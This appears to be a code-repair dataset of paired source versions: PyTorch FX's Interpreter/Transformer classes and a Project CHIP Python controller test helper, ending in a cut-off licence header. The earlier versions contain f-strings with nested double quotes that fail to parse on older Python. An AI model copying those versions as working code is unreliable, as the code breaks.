self.env[node] = self.run_node(node)
if self.garbage_collect_values:
for to_delete in self.user_to_last_uses.get(node, []):
del self.env[to_delete]
if node.op == 'output':
output_val = self.env[node]
return output_val
def run_node(self, n : Node) -> Any:
"""
Run a specific node ``n`` and return the result.
Calls into placeholder, get_attr, call_function,
call_method, call_module, or output depending
on ``node.op``
Args:
n (Node): The Node to execute
Returns:
Any: The result of executing ``n``
"""
args, kwargs = self.fetch_args_kwargs_from_env(n)
assert isinstance(args, tuple)
assert isinstance(kwargs, dict)
return getattr(self, n.op)(n.target, args, kwargs)
# Main Node running APIs
def placeholder(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``placeholder`` node. Note that this is stateful:
``Interpreter`` maintains an internal iterator over
arguments passed to ``run`` and this method returns
next() on that iterator.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Returns:
Any: The argument value that was retrieved.
"""
assert isinstance(target, str)
if target.startswith('*'):
# For a starred parameter e.g. `*args`, retrieve all
# remaining values from the args list.
return list(self.args_iter)
else:
return next(self.args_iter)
def get_attr(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``get_attr`` node. Will retrieve an attribute
value from the ``Module`` hierarchy of ``self.module``.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return:
Any: The value of the attribute that was retrieved
"""
assert isinstance(target, str)
return self.fetch_attr(target)
def call_function(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``call_function`` node and return the result.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return
Any: The value returned by the function invocation
"""
assert not isinstance(target, str)
# Execute the function and return the result
return target(*args, **kwargs)
def call_method(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``call_method`` node and return the result.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return
Any: The value returned by the method invocation
"""
# args[0] is the `self` object for this method call
self_obj, *args_tail = args
# Execute the method and return the result
assert isinstance(target, str)
return getattr(self_obj, target)(*args_tail, **kwargs)
def call_module(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``call_module`` node and return the result.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return
Any: The value returned by the module invocation
"""
# Retrieve executed args and kwargs values from the environment
# Execute the method and return the result
assert isinstance(target, str)
submod = self.fetch_attr(target)
return submod(*args, **kwargs)
def output(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute an ``output`` node. This really just retrieves
the value referenced by the ``output`` node and returns it.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return:
Any: The return value referenced by the output node
"""
return args[0]
# Helper methods
def fetch_attr(self, target : str):
"""
Fetch an attribute from the ``Module`` hierarchy of ``self.module``.
Args:
target (str): The fully-qualfiied name of the attribute to fetch
Return:
Any: The value of the attribute.
"""
target_atoms = target.split('.')
attr_itr = self.module
for i, atom in enumerate(target_atoms):
if not hasattr(attr_itr, atom):
raise RuntimeError(f"Node referenced nonexistent target {".".join(target_atoms[:i])}")
attr_itr = getattr(attr_itr, atom)
return attr_itr
def fetch_args_kwargs_from_env(self, n : Node) -> Tuple[Tuple, Dict]:
"""
Fetch the concrete values of ``args`` and ``kwargs`` of node ``n``
from the current execution environment.
Args:
n (Node): The node for which ``args`` and ``kwargs`` should be fetched.
Return:
Tuple[Tuple, Dict]: ``args`` and ``kwargs`` with concrete values for ``n``.
"""
args = self.map_nodes_to_values(n.args, n)
assert isinstance(args, tuple)
kwargs = self.map_nodes_to_values(n.kwargs, n)
assert isinstance(kwargs, dict)
return args, kwargs
def map_nodes_to_values(self, args : Argument, n : Node) -> Argument:
"""
Recursively descend through ``args`` and look up the concrete value
for each ``Node`` in the current execution environment.
Args:
args (Argument): Data structure within which to look up concrete values
n (Node): Node to which ``args`` belongs. This is only used for error reporting.
"""
def load_arg(n_arg : Node) -> Any:
if n_arg not in self.env:
raise RuntimeError(f'Node {n} referenced nonexistent value {n_arg}! Run Graph.lint() '
f'to diagnose such issues')
return self.env[n_arg]
return map_arg(args, load_arg)
class Transformer(Interpreter):
"""
``Transformer`` is a special type of interpreter that produces a
new ``Module``. It exposes a ``transform()`` method that returns
the transformed ``Module``. ``Transformer`` does not require
arguments to run, as ``Interpreter`` does. ``Transformer`` works
entirely symbolically.
Example:
Suppose we want to swap all instances of ``torch.neg`` with
``torch.sigmoid`` and vice versa (including their ``Tensor``
method equivalents). We could subclass ``Transformer`` like so::
class NegSigmSwapXformer(Transformer):
def call_function(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
transformed : torch.nn.Module = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
torch.testing.assert_allclose(transformed(input), torch.neg(input).sigmoid())
Args:
module (GraphModule): The ``Module`` to be transformed.
"""
def __init__(self, module):
super().__init__(module)
self.new_graph = Graph()
class TransformerTracer(Tracer):
def __init__(self, graph: Graph):
super().__init__()
self.graph = graph
def is_leaf_module(self, _, __) -> bool:
return True
self.tracer = TransformerTracer(self.new_graph)
self.tracer.root = module
def placeholder(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Proxy:
"""
Execute a ``placeholder`` node. In ``Transformer``, this is
overridden to insert a new ``placeholder`` into the output
graph.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
"""
assert isinstance(target, str)
return Proxy(self.new_graph.placeholder(target), self.tracer)
def get_attr(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Proxy:
"""
Execute a ``get_attr`` node. In ``Transformer``, this is
overridden to insert a new ``get_attr`` node into the output
graph.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
"""
assert isinstance(target, str)
return Proxy(self.new_graph.get_attr(target), self.tracer)
def call_module(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
# Override so that the leaf module policy from `self.tracer` is respected.
assert isinstance(target, str)
submod = self.fetch_attr(target)
return self.tracer.call_module(submod, submod.forward, args, kwargs)
def transform(self) -> GraphModule:
"""
Transform ``self.module`` and return the transformed
``GraphModule``.
"""
result = super().run()
if result is not None:
def strip_proxy(a : Union[Argument, Proxy]) -> Any:
return a.node if isinstance(a, Proxy) else a
self.new_graph.output(map_aggregate(result, strip_proxy))
return GraphModule(self.module, self.new_graph)
| from .graph_module import GraphModule
from .graph import Graph
from .node import Argument, Node, Target, map_arg, map_aggregate
from .proxy import Proxy
from .symbolic_trace import Tracer
from typing import Any, Dict, Iterator, List, Optional, Tuple, Union
class Interpreter:
"""
An Interpreter executes an FX graph Node-by-Node. This pattern
can be useful for many things, including writing code
transformations as well as analysis passes.
Methods in the Interpreter class can be overridden to customize
the behavior of execution. The map of overrideable methods
in terms of call hierarchy::
run()
+-- run_node
+-- placeholder()
+-- get_attr()
+-- call_function()
+-- call_method()
+-- call_module()
+-- output()
Example:
Suppose we want to swap all instances of ``torch.neg`` with
``torch.sigmoid`` and vice versa (including their ``Tensor``
method equivalents). We could subclass Interpreter like so::
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target,
args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target,
args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
torch.testing.assert_allclose(result, torch.neg(input).sigmoid())
Args:
module (GraphModule): The module to be executed
garbage_collect_values (bool): Whether to delete values after their last
use within the Module's execution. This ensures optimal memory usage during
execution. This can be disabled to, for example, examine all of the intermediate
values in the execution by looking at the ``Interpreter.env`` attribute.
"""
def __init__(self, module : GraphModule, garbage_collect_values : bool = True):
assert isinstance(module, GraphModule)
self.module = module
self.submodules = dict(self.module.named_modules())
self.env : Dict[Node, Any] = {}
self.garbage_collect_values = garbage_collect_values
if self.garbage_collect_values:
# Run through reverse nodes and record the first instance of a use
# of a given node. This represents the *last* use of the node in the
# execution order of the program, which we will use to free unused
# values
node_to_last_use : Dict[Node, Node] = {}
self.user_to_last_uses : Dict[Node, List[Node]] = {}
def register_last_uses(n : Node, user : Node):
if n not in node_to_last_use:
node_to_last_use[n] = user
self.user_to_last_uses.setdefault(user, []).append(n)
for node in reversed(self.module.graph.nodes):
map_arg(node.args, lambda n: register_last_uses(n, node))
map_arg(node.kwargs, lambda n: register_last_uses(n, node))
def run(self, *args, initial_env : Optional[Dict[Node, Any]] = None) -> Any:
"""
Run `module` via interpretation and return the result.
Args:
*args: The arguments to the Module to run, in positional order
initial_env (Optional[Dict[Node, Any]]): An optional starting environment for execution.
This is a dict mapping `Node` to any value. This can be used, for example, to
pre-populate results for certain `Nodes` so as to do only partial evaluation within
the interpreter.
Returns:
Any: The value returned from executing the Module
"""
self.env = initial_env if initial_env else {}
# Positional function args are consumed left-to-right by
# `placeholder` nodes. Use an iterator to keep track of
# position and extract those values.
self.args_iter : Iterator[Any] = iter(args)
for node in self.module.graph.nodes:
if node in self.env:
# Short circuit if we have this value. This could
# be used, for example, for partial evaluation
# where the caller has pre-populated `env` with
# values for a subset of the program.
continue
self.env[node] = self.run_node(node)
if self.garbage_collect_values:
for to_delete in self.user_to_last_uses.get(node, []):
del self.env[to_delete]
if node.op == 'output':
output_val = self.env[node]
return output_val
def run_node(self, n : Node) -> Any:
"""
Run a specific node ``n`` and return the result.
Calls into placeholder, get_attr, call_function,
call_method, call_module, or output depending
on ``node.op``
Args:
n (Node): The Node to execute
Returns:
Any: The result of executing ``n``
"""
args, kwargs = self.fetch_args_kwargs_from_env(n)
assert isinstance(args, tuple)
assert isinstance(kwargs, dict)
return getattr(self, n.op)(n.target, args, kwargs)
# Main Node running APIs
def placeholder(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``placeholder`` node. Note that this is stateful:
``Interpreter`` maintains an internal iterator over
arguments passed to ``run`` and this method returns
next() on that iterator.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Returns:
Any: The argument value that was retrieved.
"""
assert isinstance(target, str)
if target.startswith('*'):
# For a starred parameter e.g. `*args`, retrieve all
# remaining values from the args list.
return list(self.args_iter)
else:
return next(self.args_iter)
def get_attr(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``get_attr`` node. Will retrieve an attribute
value from the ``Module`` hierarchy of ``self.module``.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return:
Any: The value of the attribute that was retrieved
"""
assert isinstance(target, str)
return self.fetch_attr(target)
def call_function(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``call_function`` node and return the result.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return
Any: The value returned by the function invocation
"""
assert not isinstance(target, str)
# Execute the function and return the result
return target(*args, **kwargs)
def call_method(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``call_method`` node and return the result.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return
Any: The value returned by the method invocation
"""
# args[0] is the `self` object for this method call
self_obj, *args_tail = args
# Execute the method and return the result
assert isinstance(target, str)
return getattr(self_obj, target)(*args_tail, **kwargs)
def call_module(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute a ``call_module`` node and return the result.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return
Any: The value returned by the module invocation
"""
# Retrieve executed args and kwargs values from the environment
# Execute the method and return the result
assert isinstance(target, str)
submod = self.fetch_attr(target)
return submod(*args, **kwargs)
def output(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
"""
Execute an ``output`` node. This really just retrieves
the value referenced by the ``output`` node and returns it.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
Return:
Any: The return value referenced by the output node
"""
return args[0]
# Helper methods
def fetch_attr(self, target : str):
"""
Fetch an attribute from the ``Module`` hierarchy of ``self.module``.
Args:
target (str): The fully-qualfiied name of the attribute to fetch
Return:
Any: The value of the attribute.
"""
target_atoms = target.split('.')
attr_itr = self.module
for i, atom in enumerate(target_atoms):
if not hasattr(attr_itr, atom):
raise RuntimeError(f"Node referenced nonexistent target {'.'.join(target_atoms[:i])}")
attr_itr = getattr(attr_itr, atom)
return attr_itr
def fetch_args_kwargs_from_env(self, n : Node) -> Tuple[Tuple, Dict]:
"""
Fetch the concrete values of ``args`` and ``kwargs`` of node ``n``
from the current execution environment.
Args:
n (Node): The node for which ``args`` and ``kwargs`` should be fetched.
Return:
Tuple[Tuple, Dict]: ``args`` and ``kwargs`` with concrete values for ``n``.
"""
args = self.map_nodes_to_values(n.args, n)
assert isinstance(args, tuple)
kwargs = self.map_nodes_to_values(n.kwargs, n)
assert isinstance(kwargs, dict)
return args, kwargs
def map_nodes_to_values(self, args : Argument, n : Node) -> Argument:
"""
Recursively descend through ``args`` and look up the concrete value
for each ``Node`` in the current execution environment.
Args:
args (Argument): Data structure within which to look up concrete values
n (Node): Node to which ``args`` belongs. This is only used for error reporting.
"""
def load_arg(n_arg : Node) -> Any:
if n_arg not in self.env:
raise RuntimeError(f'Node {n} referenced nonexistent value {n_arg}! Run Graph.lint() '
f'to diagnose such issues')
return self.env[n_arg]
return map_arg(args, load_arg)
class Transformer(Interpreter):
"""
``Transformer`` is a special type of interpreter that produces a
new ``Module``. It exposes a ``transform()`` method that returns
the transformed ``Module``. ``Transformer`` does not require
arguments to run, as ``Interpreter`` does. ``Transformer`` works
entirely symbolically.
Example:
Suppose we want to swap all instances of ``torch.neg`` with
``torch.sigmoid`` and vice versa (including their ``Tensor``
method equivalents). We could subclass ``Transformer`` like so::
class NegSigmSwapXformer(Transformer):
def call_function(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
transformed : torch.nn.Module = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
torch.testing.assert_allclose(transformed(input), torch.neg(input).sigmoid())
Args:
module (GraphModule): The ``Module`` to be transformed.
"""
def __init__(self, module):
super().__init__(module)
self.new_graph = Graph()
class TransformerTracer(Tracer):
def __init__(self, graph: Graph):
super().__init__()
self.graph = graph
def is_leaf_module(self, _, __) -> bool:
return True
self.tracer = TransformerTracer(self.new_graph)
self.tracer.root = module
def placeholder(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Proxy:
"""
Execute a ``placeholder`` node. In ``Transformer``, this is
overridden to insert a new ``placeholder`` into the output
graph.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
"""
assert isinstance(target, str)
return Proxy(self.new_graph.placeholder(target), self.tracer)
def get_attr(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Proxy:
"""
Execute a ``get_attr`` node. In ``Transformer``, this is
overridden to insert a new ``get_attr`` node into the output
graph.
Args:
target (Target): The call target for this node. See
`Node <https://pytorch.org/docs/master/fx.html#torch.fx.Node>`__ for
details on semantics
args (Tuple): Tuple of positional args for this invocation
kwargs (Dict): Dict of keyword arguments for this invocation
"""
assert isinstance(target, str)
return Proxy(self.new_graph.get_attr(target), self.tracer)
def call_module(self, target : 'Target', args : Tuple[Argument, ...], kwargs : Dict[str, Any]) -> Any:
# Override so that the leaf module policy from `self.tracer` is respected.
assert isinstance(target, str)
submod = self.fetch_attr(target)
return self.tracer.call_module(submod, submod.forward, args, kwargs)
def transform(self) -> GraphModule:
"""
Transform ``self.module`` and return the transformed
``GraphModule``.
"""
result = super().run()
if result is not None:
def strip_proxy(a : Union[Argument, Proxy]) -> Any:
return a.node if isinstance(a, Proxy) else a
self.new_graph.output(map_aggregate(result, strip_proxy))
return GraphModule(self.module, self.new_graph)
|
#
# Copyright (c) 2021 Project CHIP Authors
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from dataclasses import dataclass
from typing import Any
import typing
from chip import ChipDeviceCtrl
from chip import ChipCommissionableNodeCtrl
import chip.interaction_model as IM
import threading
import os
import sys
import logging
import time
import ctypes
logger = logging.getLogger('PythonMatterControllerTEST')
logger.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setFormatter(
logging.Formatter(
'%(asctime)s [%(name)s] %(levelname)s %(message)s'))
sh.setStream(sys.stdout)
logger.addHandler(sh)
def TestFail(message):
logger.fatal("Testfail: {}".format(message))
os._exit(1)
def FailIfNot(cond, message):
if not cond:
TestFail(message)
class TestTimeout(threading.Thread):
def __init__(self, timeout: int):
threading.Thread.__init__(self)
self._timeout = timeout
self._should_stop = False
self._cv = threading.Condition()
def stop(self):
with self._cv:
self._should_stop = True
self._cv.notify_all()
self.join()
def run(self):
stop_time = time.time() + self._timeout
logger.info("Test timeout set to {} seconds".format(self._timeout))
with self._cv:
wait_time = stop_time - time.time()
while wait_time > 0 and not self._should_stop:
self._cv.wait(wait_time)
wait_time = stop_time - time.time()
if time.time() > stop_time:
TestFail("Timeout")
class TestResult:
def __init__(self, operationName, result):
self.operationName = operationName
self.result = result
def assertStatusEqual(self, expected):
if self.result is None:
raise Exception(f"{self.operationName}: no result got")
if self.result.status != expected:
raise Exception(
f"{self.operationName}: expected status {expected}, got {self.result.status}")
return self
def assertValueEqual(self, expected):
self.assertStatusEqual(0)
if self.result is None:
raise Exception(f"{self.operationName}: no result got")
if self.result.value != expected:
raise Exception(
f"{self.operationName}: expected value {expected}, got {self.result.value}")
return self
class BaseTestHelper:
def __init__(self, nodeid: int):
self.devCtrl = ChipDeviceCtrl.ChipDeviceController(
controllerNodeId=nodeid)
self.logger = logger
self.commissionableNodeCtrl = ChipCommissionableNodeCtrl.ChipCommissionableNodeController()
def _WaitForOneDiscoveredDevice(self, timeoutSeconds: int = 2):
print("Waiting for device responses...")
strlen = 100
addrStrStorage = ctypes.create_string_buffer(strlen)
timeout = time.time() + timeoutSeconds
while (not self.devCtrl.GetIPForDiscoveredDevice(0, addrStrStorage, strlen) and time.time() <= timeout):
time.sleep(0.2)
if time.time() > timeout:
return None
return ctypes.string_at(addrStrStorage)
def TestDiscovery(self, discriminator: int):
self.logger.info(
f"Discovering commissionable nodes with discriminator {discriminator}")
self.devCtrl.DiscoverCommissionableNodesLongDiscriminator(
ctypes.c_uint16(int(discriminator)))
res = self._WaitForOneDiscoveredDevice()
if not res:
self.logger.info(
f"Device not found")
return False
self.logger.info(f"Found device at {res}")
return res
def TestKeyExchange(self, ip: str, setuppin: int, nodeid: int):
self.logger.info("Conducting key exchange with device {}".format(ip))
if not self.devCtrl.ConnectIP(ip.encode("utf-8"), setuppin, nodeid):
self.logger.info(
"Failed to finish key exchange with device {}".format(ip))
return False
self.logger.info("Device finished key exchange.")
return True
def TestCloseSession(self, nodeid: int):
self.logger.info(f"Closing sessions with device {nodeid}")
try:
self.devCtrl.CloseSession(nodeid)
return True
except Exception as ex:
self.logger.exception(
f"Failed to close sessions with device {nodeid}: {ex}")
return False
def TestNetworkCommissioning(self, nodeid: int, endpoint: int, group: int, dataset: str, network_id: str):
self.logger.info("Commissioning network to device {}".format(nodeid))
try:
self.devCtrl.ZCLSend("NetworkCommissioning", "AddThreadNetwork", nodeid, endpoint, group, {
"operationalDataset": bytes.fromhex(dataset),
"breadcrumb": 0,
"timeoutMs": 1000}, blocking=True)
except Exception as ex:
self.logger.exception("Failed to send AddThreadNetwork command")
return False
self.logger.info(
"Send EnableNetwork command to device {}".format(nodeid))
try:
self.devCtrl.ZCLSend("NetworkCommissioning", "EnableNetwork", nodeid, endpoint, group, {
"networkID": bytes.fromhex(network_id),
"breadcrumb": 0,
"timeoutMs": 1000}, blocking=True)
except Exception as ex:
self.logger.exception("Failed to send EnableNetwork command")
return False
return True
def TestOnOffCluster(self, nodeid: int, endpoint: int, group: int):
self.logger.info(
"Sending On/Off commands to device {} endpoint {}".format(nodeid, endpoint))
err, resp = self.devCtrl.ZCLSend("OnOff", "On", nodeid,
endpoint, group, {}, blocking=True)
if err != 0 or resp is None or resp.Status != 0:
self.logger.error(
"failed to send OnOff.On: error is {} with im response{}".format(err, resp))
return False
err, resp = self.devCtrl.ZCLSend("OnOff", "Off", nodeid,
endpoint, group, {}, blocking=True)
if err != 0 or resp is None or resp.Status != 0:
self.logger.error(
"failed to send OnOff.Off: error is {} with im response {}".format(err, resp))
return False
return True
def TestLevelControlCluster(self, nodeid: int, endpoint: int, group: int):
self.logger.info(
f"Sending MoveToLevel command to device {nodeid} endpoint {endpoint}")
try:
commonArgs = dict(transitionTime=0, optionMask=0, optionOverride=0)
# Move to 0
self.devCtrl.ZCLSend("LevelControl", "MoveToLevel", nodeid,
endpoint, group, dict(**commonArgs, level=0), blocking=True)
res = self.devCtrl.ZCLReadAttribute(cluster="LevelControl",
attribute="CurrentLevel",
nodeid=nodeid,
endpoint=endpoint,
groupid=group)
TestResult("Read attribute LevelControl.CurrentLevel",
res).assertValueEqual(0)
# Move to 255
self.devCtrl.ZCLSend("LevelControl", "MoveToLevel", nodeid,
endpoint, group, dict(**commonArgs, level=255), blocking=True)
res = self.devCtrl.ZCLReadAttribute(cluster="LevelControl",
attribute="CurrentLevel",
nodeid=nodeid,
endpoint=endpoint,
groupid=group)
TestResult("Read attribute LevelControl.CurrentLevel",
res).assertValueEqual(255)
return True
except Exception as ex:
self.logger.exception(f"Level cluster test failed: {ex}")
return False
def TestResolve(self, nodeid):
self.logger.info(
"Resolve: node id = {:08x}".format(nodeid))
try:
self.devCtrl.ResolveNode(nodeid=nodeid)
addr = self.devCtrl.GetAddressAndPort(nodeid)
if not addr:
return False
self.logger.info(f"Resolved address: {addr[0]}:{addr[1]}")
return True
except Exception as ex:
self.logger.exception("Failed to resolve. {}".format(ex))
return False
def TestReadBasicAttributes(self, nodeid: int, endpoint: int, group: int):
basic_cluster_attrs = {
"VendorName": "TEST_VENDOR",
"VendorID": 9050,
"ProductName": "TEST_PRODUCT",
"ProductID": 65279,
"UserLabel": "",
"Location": "",
"HardwareVersion": 0,
"HardwareVersionString": "TEST_VERSION",
"SoftwareVersion": 0,
"SoftwareVersionString": "prerelease",
}
failed_zcl = {}
for basic_attr, expected_value in basic_cluster_attrs.items():
try:
res = self.devCtrl.ZCLReadAttribute(cluster="Basic",
attribute=basic_attr,
nodeid=nodeid,
endpoint=endpoint,
groupid=group)
TestResult(f"Read attribute {basic_attr}", res).assertValueEqual(
expected_value)
except Exception as ex:
failed_zcl[basic_attr] = str(ex)
if failed_zcl:
self.logger.exception(f"Following attributes failed: {failed_zcl}")
return False
return True
def TestWriteBasicAttributes(self, nodeid: int, endpoint: int, group: int):
@dataclass
class AttributeWriteRequest:
cluster: str
attribute: str
value: Any
expected_status: IM.Status = IM.Status.Success
requests = [
AttributeWriteRequest("Basic", "UserLabel", "Test"),
AttributeWriteRequest("Basic", "Location",
"a pretty loooooooooooooog string", IM.Status.InvalidValue),
]
failed_zcl = []
for req in requests:
try:
res = self.devCtrl.ZCLWriteAttribute(cluster=req.cluster,
attribute=req.attribute,
nodeid=nodeid,
endpoint=endpoint,
groupid=group,
value=req.value)
TestResult(f"Write attribute {req.cluster}.{req.attribute}", res).assertStatusEqual(
req.expected_status)
if req.expected_status != IM.Status.Success:
# If the write interaction is expected to success, proceed to verify it.
continue
res = self.devCtrl.ZCLReadAttribute(
cluster=req.cluster, attribute=req.attribute, nodeid=nodeid, endpoint=endpoint, groupid=group)
TestResult(f"Read attribute {req.cluster}.{req.attribute}", res).assertValueEqual(
req.value)
except Exception as ex:
failed_zcl.append(str(ex))
if failed_zcl:
self.logger.exception(f"Following attributes failed: {failed_zcl}")
return False
return True
def TestSubscription(self, nodeid: int, endpoint: int):
class _subscriptionHandler(IM.OnSubscriptionReport):
def __init__(self, path: IM.AttributePath, logger: logging.Logger):
super(_subscriptionHandler, self).__init__()
self.subscriptionReceived = 0
self.path = path
self.countLock = threading.Lock()
self.cv = threading.Condition(self.countLock)
self.logger = logger
def OnData(self, path: IM.AttributePath, subscriptionId: int, data: typing.Any) -> None:
if path != self.path:
return
logger.info(
f"Received report from server: path: {path}, value: {data}, subscriptionId: {subscriptionId}")
with self.countLock:
self.subscriptionReceived += 1
self.cv.notify_all()
class _conductAttributeChange(threading.Thread):
def __init__(self, devCtrl: ChipDeviceCtrl.ChipDeviceController, nodeid: int, endpoint: int):
super(_conductAttributeChange, self).__init__()
self.nodeid = nodeid
self.endpoint = endpoint
self.devCtrl = devCtrl
def run(self):
for i in range(5):
time.sleep(3)
self.devCtrl.ZCLSend(
"OnOff", "Toggle", self.nodeid, self.endpoint, 0, {})
try:
subscribedPath = IM.AttributePath(
nodeId=nodeid, endpointId=endpoint, clusterId=6, attributeId=0)
# OnOff Cluster, OnOff Attribute
handler = _subscriptionHandler(subscribedPath, self.logger)
IM.SetAttributeReportCallback(subscribedPath, handler)
self.devCtrl.ZCLSubscribeAttribute(
"OnOff", "OnOff", nodeid, endpoint, 1, 10)
changeThread = _conductAttributeChange(
self.devCtrl, nodeid, endpoint)
# Reset the number of subscriptions received as subscribing causes a callback.
handler.subscriptionReceived = 0
changeThread.start()
with handler.cv:
while handler.subscriptionReceived < 5:
# We should observe 10 attribute changes
handler.cv.wait()
changeThread.join()
return True
except Exception as ex:
self.logger.exception(f"Failed to finish API test: {ex}")
return False
return True
def TestNonControllerAPIs(self):
'''
This function validates various APIs provided by chip package which is not related to controller.
TODO: Add more tests for APIs
'''
try:
cluster = self.devCtrl.GetClusterHandler()
clusterInfo = cluster.GetClusterInfoById(0x50F) # TestCluster
if clusterInfo["clusterName"] != "TestCluster":
raise Exception(
f"Wrong cluster info clusterName: {clusterInfo["clusterName"]} expected TestCluster")
except Exception as ex:
self.logger.exception(f"Failed to finish API test: {ex}")
return False
return True
| #
# Copyright (c) 2021 Project CHIP Authors
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
